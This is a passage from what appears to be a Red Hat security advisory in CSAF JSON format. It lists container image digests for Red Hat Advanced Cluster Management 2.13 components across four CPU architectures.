"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.13",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.13"
},
{
"category": "default_component_of",
"full_product_name": {
